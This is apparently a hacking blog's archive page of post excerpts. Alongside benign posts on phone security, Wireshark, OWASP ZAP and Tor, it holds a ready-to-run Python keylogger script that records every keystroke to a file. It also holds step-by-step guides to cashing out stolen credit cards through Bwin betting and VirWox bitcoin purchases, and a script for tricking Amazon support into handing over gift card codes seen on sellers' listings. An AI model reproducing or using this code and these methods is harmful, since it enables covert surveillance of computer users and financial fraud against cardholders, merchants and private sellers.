Posts

Showing posts from March, 2018

Create a KeyLogger simply in a minute with Notepad

Image
Keylogger also called keystroke logging, are software programs or hardware devices that record keys struck on the computer keyboard of an individual computer user or network of computers.It almost records every keystroke that user typed and saved as a text file. Just open the notepad and copy paste the script. import pyHook, pythoncom, sys, logging # feel free to set the file_log to a different file name/location file_log = 'keyloggeroutput.txt' def OnKeyboardEvent(event): logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s') chr(event.Ascii) logging.log(10,chr(event.Ascii)) return True hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = OnKeyboardEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages() Now save it something filename.pyw and execute the keylogger file. When you need to quit logging, open up task manager and execute all the “python” forms. At that point search for keyloggeroutput.txt in a similar index were the som

How to know your smart phone has been Hacked

Image
Smartphones are almost always connected to the internet, so it stands to reason that your phone hacked remotely. Hackers are always out there looking for entry points, and they seem to get more and more sophisticated as time moves along.Even if you keep your smartphone safe in your pocket or purse, it’s still at risk for picking up a virus or leaking data to thieves. Hackers don’t need physical access to your phone to steal your personal information or infect the device with malware. They can even use your data's for something special makes profit. The first indication that your phone hacked might have some form of malware or spyware installed would be random popups. Your phone runs out of battery faster than normal. If you don’t keep apps running in the background, there could be an unknown app running on your phone and draining energy. The next thing you should be on the lookout for is your data usage. Spyware apps by nature like to “phone home,” meaning that the data they steal

How to protect your smart phone from being Hacked

Image
Smartphones are almost always connected to the internet, so it stands to reason that your phone hacked remotely. Hackers are always out there looking for entry points, and they seem to get more and more sophisticated as time moves along.Even if you keep your smartphone safe in your pocket or purse, it’s still at risk for picking up a virus or leaking data to thieves. Hackers don’t need physical access to your phone to steal your personal information or infect the device with malware. For starters, never open a link from a strange text message. This also applies to links in which you cannot see the full URL. Keep your phone up to date – always install software updates as soon as they become available. First, make sure your phone is password-protected. A recent McAfee study found that more than a third of users don’t use a password on their phones. More and more often, employees are using their personal smartphones for work in which companies load their own apps onto the employees’ perso

How to Hide Photos/Folders without any Application

Image
Hiding your personal picture files from your smartphone gallery is something critical. Frequently you end up installing a third party app to carry out the activity for you.You can hide your stuff like photos and folders without any application utilizing the trick beneath in few second. Any folders can be hidden from the smartphone gallery by following a basic trick. Step 1 Let’s say that you want to hide the folder which has the Screenshot images. To achieve the same, simply follow the steps below. Step 2 Launch the file explorer and navigate along the path to the folder that you don’t want to be shown in your gallery of Images. Since the folder that we want to hide is Screenshot, click on Pictures as shown in the below image. Under the Pictures folder, spot the sub folder named Screenshot, that you want to hide. Step 3 Long tap on the folder, to rename it. When the operations list pops up, choose Rename operation. STEP 4 You have to append a dot (.) at the beginning of the folder name

BWIN Carding and Cashout Method

Image
You need Bwin android app, credit card from one of the countries where Bwin online betting is available ( https://www.bettingexpert.com/bwin/licence#legal ), vpn, corporate mail adress ( yahoo, gmail or outlook ) and paypal acount from the same coutry where credit card is based in. You turn on the vpn to the same country cc is based in, create account using the info of cardholder, for some countries it asks for phone number for some it doesn't, but even if it asks you can type any legit phone number from that country ( there is no phone nor sms veryfication, I tried it ). Then you go to deposit section of the app where you choose deposit method, ofcourse you should choose credit card. You type in the amount you want to deposit and only info about credit card it asks are cc number, exp date and cvv. After first deposit you should put some small amount of money on some betting ticket or on rullete and play to look like a regular user, if you win great, if you lose it doesn't matt

CVV cashout via BTC Over same channel

Image
I’d tidy this up a bit with a noob-friendly tutorial on how to buy bitcoins with a CVV through VirWox. What you will need. Valid CVV (any country will do) Clean Socks5 proxy as close as possible to cardholder’s address Good DNS setup Ok lets get started. You’ll need an email account. Go create a new one at yahoo/gmail/whatever…..doesn’t matter which (i wouldn’t use tormail for this……too much of a flag). Go to https://www.virwox{.}com/, and create a new account using the email you just set up and the name on the CVV. Just make up a fake SL avatar – you don’t need to validate it. You will then have to confirm your new account by retrieving the temp password from your email. First thing to do in Virwox is change your password in the “Change Settings” tab on the left. Now we’re ready to do some carding. Click “deposit” and scroll down to the Skrill(moneybookers) option. Then enter the max amount for the currency of your card (currently $56 for USA cards) and click the moneybookers logo. If

Trick to get free Amazon Giftcards

Image
GiftCards is the leading sharing mechanism, with over 8 million gift cards sold and counting. It is our mission to provide smiles for both gift card buyers and recipients by offering personalized gift cards and custom greetings. Visa Gift Cards are our most popular gift cards which can be customized with a photo and message type. please follow the given steps STEPS! 1. FIND A SELLER ON EBAY/KIJIJI/CRAIGSLIST (LOCAL WORKS BETTER) THAT IS SELLING A $25+ AMAZON GIFT CARD. 2. MESSAGE SAID SELLER ASKING TO SEE THREE AND ONLY THREE CONSECUTIVE NUMBERS SO YOU CAN EMAIL AMAZON AND MAKE SURE THE CARD IS LEGIT, AND NOT A SPOOF CARD 3. ONCE THE SELLER HAS SENT YOU PICTURES OF THE CARD, TAKE NOTE OF THE 3 CONSEC. NUMBERS 4. EMAIL/LIVE CHAT (LIVE CHAT FOR BETTER AND FASTER RESULTS) AMAZON AND TELL THEM THIS, "MY AUNT JAMIE TOLD ME SHE HAS GOT AN AMAZON CARD FOR HER BIRTHDAY BUT AFTER TAKING IT OUT OF HER BAG SHE FOUND IT THE CODE AT THE BACK ALL SCRATCHED UP AND UN READABLE SO SHE GAVE IT TO M

What is Wireshark | Network Protocol Analyzer

Image
Wireshark is the world’s foremost and widely-used network protocol analyzer. It lets you see what’s happening on your network at a microscopic level and is the de facto (and often de jure) standard across many commercial and non-profit enterprises, government agencies, and educational institutions. Wireshark development thrives thanks to the volunteer contributions of networking experts around the globe and is the continuation of a project started by Gerald Combs in 1998. WireShark is the network protocol analyzer. It lets you check what is happening in your network. You can live capture packets and analyze them. It captures packets and lets you check data at the micro-level. It runs on Windows, Linux, OS X, Solaries, FreeBSD and others. WireShark requires good knowledge of network protocols to analyze the data obtained with the tool. If you do not have good knowledge of that, you may not find this tool interesting. So, try only if you are sure about your protocol knowledge. Download :

OWASP Zed Attack Proxy Project

Image
The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers*. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. Its also a great tool for experienced pentesters to use for manual security testing. The Zed Attack Proxy (ZAP) is now one of the most popular OWASP projects. The fact that you’ve reached this page means that you are likely already a relatively seasoned cyber security professional so it’s highly likely that you are very familiar with OWASP, not least the OWASP Top Ten Threats listing which is considered as being the ‘guide-book’ of web application security. This hacking and pentesting tool is a very efficient as well as being an ‘easy to use’ program that finds vulnerabilities in web applications. ZAP is a popular tool because it does have a lot of support and the OWASP community is really an

Hack a web server | Be an Ethical Mind | Save Privacy

Image
I'm going to provide the common methodology that is followed when hacking a machine/network/server. This tutorial will give you a good understanding & an overview about professional penetration test in a black box (attacker) point of view. It is designed to give you the idea on how an attacker can break into your system, what am gonna say will increase your awareness & will open the door for you to go out & educate yourself easily. I gathered these info from various sources and tutorials, i have changed many stuff, clarified many parts, gave some references, and put many information together. I'm still a learner & on the way to my goal. However, this won't prevent from teaching others what i have learned so far & don't worry i'm not going to provide you any info that i'm not sure about yet. It is not the best tutorial out there, but at least it is a good starter. I will speak in a hacker (attacker or blackbox) point of view. I write this tuto

Always use private internet network | Tor Network

Image
Tor does not protect all of your computer's Internet traffic when you run it. Tor only protects your applications that are properly configured to send their Internet traffic through Tor. To avoid problems with Tor configuration, we strongly recommend you use the  Tor Browser . It is pre-configured to protect your privacy and anonymity on the web as long as you're browsing with Tor Browser itself. Almost any other web browser configuration is likely to be unsafe to use with Tor.